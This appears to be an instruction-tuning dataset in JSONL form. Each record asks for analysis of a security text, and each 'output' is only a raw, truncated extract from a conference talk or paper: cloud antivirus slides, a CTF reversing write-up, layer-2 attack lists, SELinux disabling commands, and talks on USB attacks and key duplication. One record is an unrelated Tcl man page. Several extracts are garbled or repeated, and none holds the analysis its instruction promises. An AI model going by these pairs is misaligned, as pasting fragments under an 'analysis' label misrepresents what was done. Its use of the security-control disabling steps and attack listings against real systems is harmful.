{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n360雲安全 全球最大的雲安全系統 360副總裁 陸劍鋒 2010-07 木馬互聯網時代的主要安全威脅  單機系統時代病毒是電腦安全的主要威脅 傳播介質磁片等移動介質 傳播方式交叉感染 傳播目的破壞電腦系統  互聯網路時代木馬是電腦安全的主要威脅 傳播介質互聯網路 傳播方式網格狀交叉模式 傳播目的非法獲取財產 木馬侵犯使用者財產的方式多種多樣  木馬形式多樣角色各異 盜號木馬盜取虛擬財產 僵屍網路對網站等攻擊勒索 肉雞木馬在用戶的電腦中彈出廣告 間諜木馬竊取隱私和商業機密 肉雞 高額利潤催生木馬黑色產業鏈  產業中的木馬利益鏈 造馬 改馬 賣馬 買馬 發馬 掛馬 CCTV報導中國木馬產業鏈年收入已經達到了100億元 360安全中心資料 新增木馬數每年增長十倍 360的摩爾定律 卡 慢 效果差 傳統殺毒軟體面臨的問題 龐大的資源佔用造成卡機 掃描慢 木馬特徵庫更新慢 輕鬆被免殺 跟不上木馬病毒的變化速度 擁有3億互聯網用戶 近萬台雲計算伺服器處理 海量樣本識別和查詢任務 每日處理數百億次查詢 每日發現百萬新木馬 平均處理時間僅30秒 360基於雲計算提供安全服務 輕 快 強 輕巧不卡機  比傳統殺軟快10倍  無需更新特徵庫即能查殺  新木馬從發現處理到用戶查殺僅需30秒  龐大的用戶社區捕獲新木馬快而全  最大的雲端黑白名單+本地智慧規則 360雲查殺輕鬆解決傳統殺軟的問題 1. 雲端文件知識庫的完備性 2. 雲查詢的快速即時回應 3. 對未知文件的即時處理 雲安全需要解決的三大問題 白名單的完備性 雲安全中最大的難點 360白名單已經覆蓋98%的 合法程式 黑名單的積累 每日發現150萬以上的新增 木馬病毒 新程式的收集能力 搜尋引擎的蜘蛛技術 3億用戶保證即時發現不遺漏 360軟體認證服務 手工收集和人工甄別 日收集新程式1000萬 雲端知識庫的三大要素  基於奇虎強大的搜尋引 擎技術  千億規模下高性能查詢  高可靠性高穩定性 雲查詢快速及時的回應能力 未知文件的處理  多樣性的判別機制確保不漏報不誤報 檔特徵行為特徵智慧啟發統計分類  奇虎雲計算平臺實現海量處理能力 日均數千萬樣本處理能力 30秒平均回應時間  沒有用戶端的安全就像天龍八部中的王語嫣空有武學 但是無法防身  360的用戶端安全 自我保護 啟動項保護 系統檔案保護 驅動防火牆 進程保護 網路保護 鍵盤保護 密碼保護 安全=雲+端安全 雲安全還需要端安全  基於雲安全的主動防禦技術  最完整的防禦最少的用戶干預 雲安全的應用主動防禦  雲安全鑒別流覽器中的掛馬釣魚欺詐網頁  每日鑒別網址數 數十億 雲安全的應用流覽器  360殺毒採用雲安全特徵掃描雙引擎 雲安全的應用殺毒引擎 全球最大的雲安全系統  360安全衛士用戶數超過3億  日均未知樣本分析數千萬  日均檢測網頁數千萬  日均雲查詢數數百億次  累計文件知識庫近十億  白名單覆蓋率98%  未知樣本平均處理時間30秒  IDC機房數120個  頻寬150+G  伺服器數近萬台 隱私保護  隱私承諾  檔上傳明確聲明  僅上傳可執行程式  原始程式碼託管  加入IAPP隱私保護協會 真免費才能真安全 擊垮木馬產業鏈需要真正全面徹底地免費  零成本才能武裝和保護全體線民  假免費是木馬的溫床  殺毒免費防火牆安全套裝更要免費 Source:iResearch Database 360安全衛士 360殺毒 中國安全軟體態勢 免費的360系列產品已經覆蓋3億用戶佔據中國80%的線民 Thanks!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Fake 150 (re, 150p) ### PL [ENG](#eng-version) Dostajemy [program](./fake) (elf), do analizy, i rozpoczynamy od zdekompilowania go: int main(int argc, char **argv) { v = 0; vv = (v >> 19); vvv = (v >> 63); if (argc > 1) { v = strtol(argv[1], 0, 10); } uint64_t va[5]; va[0] = 1019660215 * v; va[1] = 2676064947712729 * ((v >> 19) - 2837 * (((int64_t)((6658253765061184651 * (v >> 19)) >> 64) >> 10) - (v >> 63))) * ((v >> 19) - 35 * (((int64_t)((1054099661354831521 * (v >> 19)) >> 64) >> 1) - (v >> 63))) * ((v >> 19) - 33 * (((int64_t)((1117984489315730401 * (v >> 19)) >> 64) >> 1) - (v >> 63))); va[2] = (vv - 9643 * (((int64_t)((1958878557656183849 * vv) >> 64) >> 10) - vvv)) * 5785690976857702 * (vv - 167 * (((int64_t)((7069410902499468883 * vv) >> 64) >> 6) - vvv)); va[3] = (vv - 257 * (((int64_t)((9187483429707480961 * vv) >> 64) >> 7) - vvv)) * 668176625215826 * (vv - 55 * (((int64_t)((5366325548715505925 * vv) >> 64) >> 4) - vvv)); va[4] = (vv - 48271 * (((int64_t)((1565284823722614477 * vv) >> 64) >> 12) - vvv)) * 2503371776094 * (vv - 23 * (((int64_t)(vv + ((0x0B21642C8590B2165 * vv) >> 64)) >> 4) - vvv)); puts((const char *)va); return 0; } Jak widać wykonywane jest tutaj sporo operacji matematycznych, a potem wynikowa liczba wypisywana jako tekst na konsolę. Piszemy więc prosty skrypt w pythonie, który po prostu zbrutuje możliwe liczby i wypisze wynik. Założenie jest takie, że output zaczyna się od ASIS{ oraz zawiera tylko znaki 0..9a..f. Sprawdzamy więc bruteforcując wszystkie możliwe dane wejściowe dla pierwszej operacji. Wiemy że: X * M === 'ASIS{...' (mod 264) <=> X === 'ASIS{...' * M-1 (mod 264). Odwrotność modularną M możmy łatwo wyliczyć za pomocą rozszerzonego algorytmu euklitesa, więc mamy 224 możliwości do sprawdzenia na trzy pozostałe bajty (to był błąd swoją drogą, wystarczyło sprawdzać charset 0..9a..f zamiast pełnego zakresu bajta, wtedy możliwoścy byłoby ledwo 4096). Następnie dla każdej z tych opcji sprawdzamy czy zgadza się kolejne równanie", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nK &T :: IGS :: MAF K &T :: IGS :: MAF 11 VLANs Layer 2 Attacks: VLANs Layer 2 Attacks: Their Relevance Their Relevance and and Their Kryptonite Their Kryptonite VLAN Layer 2 Attacks K &T :: IGS :: MAF K &T :: IGS :: MAF 22  Security is only as strong as the weakest link Security is only as strong as the weakest link  Layer 2 attacks are timeworn but still relevant in today's networking Layer 2 attacks are timeworn but still relevant in today's networking environment environment  Crime and security survey show different types of attacks for the year of Crime and security survey show different types of attacks for the year of 2007. CSI / FBI surveys also show that 9 of 19 types of attacks could 2007. CSI / FBI surveys also show that 9 of 19 types of attacks could target routers and switches target routers and switches Attacks (other) Possible Layer 2 VLAN Layer 2 Attacks  Cisco 3600, 2600 routers Cisco 3600, 2600 routers  Cisco 2900, 3500, 4006 switches Cisco 2900, 3500, 4006 switches  Wifi Netgear & Cisco-Linksys Wifi Netgear & Cisco-Linksys Tools Tools  Scapy Scapy  Yersinia Yersinia  Macof Macof  TCPDump TCPDump  Cain & Abel Cain & Abel  EtterCap EtterCap  Ethereal Ethereal K &T :: IGS :: MAF K &T :: IGS :: MAF 33 Equipment Equipment Attacks Attacks  ARP Attacks ARP Attacks  MAC Flooding Attack/ CAM Table Overflow Attacks MAC Flooding Attack/ CAM Table Overflow Attacks  DHCP Starvation Attack DHCP Starvation Attack  CDP Attack CDP Attack  Spanning-Tree Attack Spanning-Tree Attack  Multicast Brute Force Multicast Brute Force  VLAN Trunking Protocol Attack VLAN Trunking Protocol Attack  Private VLAN Attack Private VLAN Attack  VLAN Hopping Attack VLAN Hopping Attack  Double-Encapsulated 802.1Q/Nested VLAN Attack Double-Encapsulated 802.1Q/Nested VLAN Attack  VLAN Management Policy server VMPS/ VLAN VLAN Management Policy server VMPS/ VLAN Query Protocol VQP Attack Query Protocol VQP Attack VLAN Layer 2 Attacks How to get a lab for testing purposes How to get a lab fo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHITCON 101 Sharing SELinux 從不認識到在一起 About Me 王禹軒 (Bighead)  中央大學 Advanced Defense Lab  打胖  工研院 Intern  Whitelist 1.0 PoC  Hypervisor-based Whitelist (page verification)  SELinux SELinux Top Search The ways to disable SELinux  Setenforce 0  Edit /etc/selinux/config : SELINUX = permissive or disable  Delete policy  Get rid of the boot argument : security=selinux selinux=1 The ways to disable SELinux  Setenforce 0  Edit /etc/selinux/config : SELINUX = permissive or disable  Delete policy  Get rid of the boot argument : security=selinux selinux=1  Do NOT use default SELinux-enabled distro (CentOS) The ways to disable SELinux  Setenforce 0  Edit /etc/selinux/config : SELINUX = permissive or disable  Delete policy  Get rid of the boot argument : security=selinux selinux=1  Do NOT use default SELinux-enabled distro (CentOS) SELinux gives you the power to close it Dont be Afraid of SELinux  60 page survey paper  400 page SELinux Notebook  Makefile survey  Policy Set survey  Powerful mentor Dont be Afraid of SELinux  60 page survey paper  400 page SELinux Notebook  Makefile survey  Policy Set survey  Powerful mentor Dont be afraid! It is not scary Trust Lovely Santa Claus Reference : Santa Claus PNG Transparent Image - PngPix Trust Evil Santa Claus !? Futurama : Robot Santa Claus Why Access Control ?  Goal: Protect data and resources from unauthorized use  Confidentiality (or secrecy) : Related to disclosure of information  Integrity : Related to modification of information  Availability : Related to denial of access to information Reference: Security Awareness Posters Access Control Basic Terminology  Subject: Active entity  user or process  Object: Passive entity  file or resource  Access operations: read, write, ... Subject Object Action Access Control is Hard Because  Access control requirements are domain-specific  Generic approaches over-generalize  Access control requirements can change  Anyone could be an administrator Reference : https://profile.cheezburger.com/imag", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUniversity of California, Santa Barbara HITCON Enterprise August 27th, 2015 A Dozen Years of Shellphish From DEFCON to the Cyber Grand Challenge Antonio Bianchi antoniob@cs.ucsb.edu 3 A Dozen Years of Shellphish  from DEFCON to the Cyber Grand Challenge Agenda  Shellphish  The DARPA Cyber Grand Challenge  Shellphishs Cyber Reasoning System  Automatic Vulnerability Discovery  Angr  Live demonstration!  Towards the Cyber Grand Challenge Finals 4 A Dozen Years of Shellphish  from DEFCON to the Cyber Grand Challenge Agenda  Shellphish  The DARPA Cyber Grand Challenge  Shellphishs Cyber Reasoning System  Automatic Vulnerability Discovery  Angr  Live demonstration!  Towards the Cyber Grand Challenge Finals 5 A Dozen Years of Shellphish  from DEFCON to the Cyber Grand Challenge Shellphish  Who are we?  a team of security enthusiasts  do research in system security  play Capture the Flag competitions 6 A Dozen Years of Shellphish  from DEFCON to the Cyber Grand Challenge Shellphish  Started (in 2004) at:  SecLab: University of California, Santa Barbara 7 A Dozen Years of Shellphish  from DEFCON to the Cyber Grand Challenge Shellphish  expanded to:  Northeastern University: Boston  Eurecom: France  ... 8 A Dozen Years of Shellphish  from DEFCON to the Cyber Grand Challenge CTF competitions  Security competitions  Different challenges  exploit a vulnerable service  exploit a vulnerable website  reversing a binary    Different formats  Jeopardy  Attack-Defense  Online  Live 9 A Dozen Years of Shellphish  from DEFCON to the Cyber Grand Challenge Shellphish 10 A Dozen Years of Shellphish  from DEFCON to the Cyber Grand Challenge Shellphish  We do not only play CTFs  We also organize them!  UCSB iCTF  Attack-Defense format  every year, since 2002!  References:  http://ictf.cs.ucsb.edu  https://github.com/ucsb-seclab/ictf-framework  Vigna, et al., \"Ten years of ictf: The good, the bad, and the ugly.\" 3GSE, 2014. 11 A Dozen Years of Shellphish  from DEFCON to the Cyber Grand Challe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: cd.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '\\", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUniversal*Serial* aBUSe Rogan&Dawes&&&Dominic&White research@sensepost.com Important*Note  This&is&the&text8based&version&of&the&slides,&and&not& the&version&we&plan&to&present.&We&wanted&to&give& you&something&meaningful&to&read&through.  The&toolset&will&be&released&on&our&github:  https://github.com/sensepost/USaBUSe  Details&of&the&talk,&latest&slides&and&code&will&be& written&up&at&our&blog:  https://sensepost.com/blog Background&http://sneakyninja95.deviantart.com/art/Stored8Memories8535612391 Overview In&this&talk,&well&cover&some&novel&USB8level&attacks,& that&can&provide&remote&command&and&control&of,& even&air8gapped&machines,&with&a&minimal&forensic& footprint,&and&release&an&open8source&toolset&using& freely&available&hardware. The*Meta*Point  Its&hard&to&defend&at&the&best&of&times.  Doing&so&well,&requires&a&realistic&threat&model.  Too&often,&that&threat&model&is&driven&by&vendor& marketing&rather&than&real&attacks.  For&example,&advanced&attackers&have&always&existed,& its&not&clear&APT&would&have&been&a&thing,&or&as&much& of&a&thing&without&the&significant&vendor&marketing& spend&put&behind&it.  Penetration&testers&need&to&emulate&real&threats&or& theyre&just&wasting&your&time Why*were*highlighting*this*issue  Weve&seen&real&attackers&doing&it,&but&defenses& havent&adapted.  The&NSAs&COTTONMOUTH&toolkit&showed&these&sorts&of& USB&attacks  Technically&unsophisticated&criminals&have&defrauded& banks&using&simple&IP&KVMs  If&your&apex&predators&and&low&level&bottom&feeders& are&using&the&same&sort&of&attacks;&physical& bypasses&of&software/network&security&via& hardware,&then&you&best&pay&attention.  Plus,&it&makes&sense,&software&is&getting&harder&to& exploit&and&changes&more&rapidly&than&hardware. But*we*know*about*these*attacks?  Do&we?&Because&the&defenses&in&this&space&seem&to&be&poor& in&our&experience&at&clients.  Hardware&keyloggers have&been&around&for&decades,&and& are&still&near&impossible&to&practically&detect&in&software.  Most&organisatio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 中国实战化白帽人才能力 白皮书 2021.1 补天漏洞响应平台 奇安信安服团队 奇安信行业安全研究中心 i 专家点评 红蓝对抗和实战化渗透近年来受到越来越多企业的重视也成为企业安全体系建设不可 或缺的重要环节尤其是每年的大型网络安全实战攻防演习更催生了行业对白帽子群体的 关注和需求也对白帽子能力提出了更高的要求补天的实战化白帽能力白皮书是一个很 好的行业尝试可以作为白帽子群体能力发展的一个很好的参考也可以为初学者答疑解 惑指明方向 Tencent Blade Team 技术负责人 张博(cradmin) 补天平台作为国内最大的漏洞平台拥有超过 7.4 万名白帽子每年发放超过数千万漏洞 奖金收获数十万漏洞信息基于这些数据和实践补天平台对白帽子的等级能力模型 进行整理并发布本报告报告中包含了不同等级白帽子所需要具备的能力以及成长路径 规划对于即将成为白帽子或者希望可以成为更有实战化能力的白帽子来说非常具有参考 价值 字节跳动安全中心负责人 林伟 随着高级持续性威胁的增长实战攻防技术的发展传统的基于 OWASP TOP 10 以及 PTES 的渗透测试已经不再能满足各企事业单位对于网络防护能力检测能力和响应能力的评估 需求因此网络安全检测应该与时俱进将实战化的网络安全评估能力纳入到范畴当中 很欣喜能够看到补天作为国内影响力极高的漏洞响应平台能够在此做深入的思考和尝试 也将白帽子带到一个更高的实战能力水平上来 京东安全攻防对抗组负责人 叶猛 这几年安全行业越来越成熟化法律体系也在不断的完善过了行业发展的野蛮期实战的 机会变少了实战性的人才也就跟着少了大部分的白帽子都是通过授权测试和打 靶场的方式获得有限的技术成长再加上自动化工具越来越精细白帽子变得越来越 懒的同时也越来越迷茫补天这一次从行业里开了一个好头给更多想成为真正实战性 人才的白帽子们构建了一个更系统化的学习成长轨迹 网络尖刀团队创始人 曲子龙 补天作为国内当下聚集白帽子最多的平台对如此庞大的用户人群进行数据分析并制定相 关标准是极具说服力的该白皮书涵盖了白帽子年龄学历工作与否和年限以及实战 化能力的分级因此对白帽级别的划分以及企业所需人才的分析便显得更具分量真正是 该行业下的企业学习者以及感兴趣人群值得一看的内容 ChaMd5 安全团队创始人 M ii 主要观点  白皮书结合补天漏洞响应平台白帽培养实践经验及奇安信集团安服团队蓝队攻防 实战经验首次提出了实战化白帽人才能力的基本概念并系统性地给出了实战化 白帽人才能力图谱图谱为实战化白帽人才的系统性培养以及白帽人才的自主学 习提供了重要的科学参考依据  实战化白帽人才能力是指在政企机构实际运行的业务系统生产系统上进行的实 战攻防演习过程中作为攻击方的白帽子所需要具备各种攻防能力的集合与传统 的挖洞型白帽人才能力要求不同实战化能力要求白帽子具备在真实的业务系统上 综合利用各种技术和非技术手段进行动态实战攻防的能力  白皮书将实战化白帽人才能力分为 3 个级别14 大类85 项具体技能其中基 础能力 2 类 20 项进阶能力 4 类 23 项高阶能力 8 类 42 项  补天漏洞响应平台针对具有实战攻防演习经验的 645 位高级白帽子的调研显示 目前国内白帽子人群所掌握的实战化攻防能力仍主要集中在基础能力方面而具 备高阶能力的白帽人才则十分稀缺特别是不同平台程序的分析能力在系统层漏 洞的挖掘与利用以及相应的 PoC 或 EXP 的编写等方面相关人才更是凤毛麟角 iii 摘 要  从行业分布来看36.3%的白帽子来自于安全企业34.9%的白帽子仍是学生7.1% 的白帽子来自政府机构事业单位  从年龄分布来看近半数的白帽子年龄在 22 岁及以下35.7%的白帽子年龄在 23- 27 岁从学历来看本科及以下学历超过 9 成其中本科学历占比 36.3%本科 在读占比 21.9%还有 24.5%的白帽子为大专学历  从从业时间来看进入安全行业 1-3 年的白帽子最多占比 51.2%其次为拥有 4- 6 年安全从业经验的白帽子占比 21.2%  本次调研显示55.8%的白帽子目前仍然处于无证上岗的状态  2020 年实战化白帽人才基础能力中平均每个白帽子掌握 4 个 Web 漏洞利用方式 会使用 6 个安全工具  2020 年实战化白帽人才进阶能力中平均每个白帽子掌握 3 个 Web 漏洞的挖掘能 力能够使用 2 种编程语言对 Web 开发和编程更擅长使用社工库与鱼叉邮件进行 社工钓鱼  2020 年实战化白帽人才高阶能力较弱系统层漏洞利用与防护系统层漏洞挖掘 以及对不同系统编写 PoC 或 EXP 等高级利用能力掌握不够相比之下多数白帽子 身份隐藏与内网渗透能力掌握较好约 74.0%的白帽子具有组队参加有关部门组织 的实战攻防演习活动的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDuplicating Restricted Keys Billy & Bobby Graydon Outline 1. Keyways 2. Other Stuff How keys work How Key Cutting works How keyways work 3D Printing The Old Approach to Keyway Research Our Approach to Keyway Research C: E: F: : : BEST A Bump Key Pic of CPC arrow press dies Pic of pressed CPC blanks Medeco Press Lost Lock... + + = Lost Lock... + + = Lost Lock... + + = M3 Blank Manufacturing m3 Variations Master m3 Keyway M3 Cut on M19, working Photographing a Lock  Measuring the Key Photographing the Key Milling Marks - Shallow Slope Gives Precision r D G Outline 1. Keyways 2. Other Stuff a. Sidewinder Keys b. Primus c. Assa d. Medeco Angled Cuts e. Dimple Locks, Mul-T-Lock f. Interactive Components, Mul-T-Lock g. Disc Detainer Locks, Abloy h. Patents i. Duplication Authorisation Cards MT5 Patent = No ebay blanks Outline 1. Keyways 2. Other Stuff 3. Bonus! Remediation Lost Lock = Lost GMK = Sectional keyways - great as an extra security control. Bad as the only one. Restricted keyways - great as an extra security control. Bad as the only one. physical keys are dead hurr durr physical keys are dead hurr durr Understand your threat model. 4N6 Microscopy Questions! b.graydon@ggrsecurity.com r.graydon@ggrsecurity.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 群控相关 群控本质是属于对设备资源的集中管控具有提高设备资源管控效率降低总体设备资源成本的优点 群控的主要流程为操作平台群控服务器设备池 ## 1. 群控的发展 以下按照群控的发展过程进行介绍 ### 1.1 一代群控 - 多开模拟器 一代群控主要是指**多开模拟器**可以将一台越狱的iPhone或者安卓机模拟出多个对应的系统由于风控系统对设备指纹的检查愈加严格对这种传统的多开模拟还是能较好地进行识别 ### 1.2 二代群控 - 群控墙 二代群控主要指通过脚本和改机工具对数量众多的真机进行批量操控形成群控墙的形式 <img src=\"https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20201006235109.png\" style=\"zoom:50%;\" /> 图群控墙[1] ### 1.3 三代群控 - 箱控 在这个阶段为了进一步压缩群控系统的搭建成本将真机中一些用不到的器件进行了去除集成为箱式的群控系统对设备进行批量操控 ### 1.4 四代群控 - 真机云控 从这代开始群控系统开始迈入SaaS模式群控系统这一基础设施不再需要中下游的黑产团伙自行搭建购买专门的群控服务即可租用到真实设备资源 传统云控主要是指在群控墙箱控的基础上使用平台系统远程进行操控的形式此时的群控还是没有突破真机的限制 ### 1.5 五代群控 - 新式云控 从这代云控开始群控系统逐渐走向无真机的形式使用云端**协议外挂**的方式发送符合的数据包与服务器进行通讯同样也能实现相应的业务操作从而脱离的了真机设备的限制并且也正是由于这种云端的集成化使得其能更好地结合一些改机工具进行深度的作弊操作 这种情况下基于传统的设备资源指纹特征已经很难进行检测了并且其作弊成本如果排除研发成本已经非常低了 ## References \\[1] 风控要略互联网业务反欺诈之路马传雷", "category": "text_analysis", "source": "security_papers"}